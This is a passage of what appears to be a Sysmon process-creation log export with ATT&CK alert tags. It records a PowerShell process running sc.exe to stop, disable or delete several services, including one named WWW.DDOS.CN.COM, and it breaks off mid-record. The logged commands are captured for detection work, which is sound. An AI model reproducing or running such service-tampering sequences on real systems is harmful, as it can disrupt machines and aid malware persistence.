+CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.273634700Z"",""eventRecordID"":""3890"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.267\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00102adf3000}\r\nProcessId: 7360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.267"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00102adf3000}"",""processId"":""7360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.390",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.241 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00104ede3000} +ProcessId: 836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config clr_optimization Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config clr_optimization Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.244090000Z"",""eventRecordID"":""3889"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.241\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00104ede3000}\r\nProcessId: 836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config clr_optimization Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.241"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00104ede3000}"",""processId"":""836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config clr_optimization Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.360",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.189 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e7db3000} +ProcessId: 3252 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.193937500Z"",""eventRecordID"":""3887"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.189\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e7db3000}\r\nProcessId: 3252\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.189"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010e7db3000}"",""processId"":""3252"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.313",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.108 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bdd83000} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.116134800Z"",""eventRecordID"":""3884"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.108\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bdd83000}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.108"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010bdd83000}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.271",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.018 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001099d63000} +ProcessId: 4492 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.024243200Z"",""eventRecordID"":""3882"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.018\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001099d63000}\r\nProcessId: 4492\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.018"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001099d63000}"",""processId"":""4492"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.255",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.976 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00105cd53000} +ProcessId: 7936 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.995095000Z"",""eventRecordID"":""3881"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.976\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00105cd53000}\r\nProcessId: 7936\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.976"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00105cd53000}"",""processId"":""7936"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.206",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.847 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00100ad23000} +ProcessId: 772 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 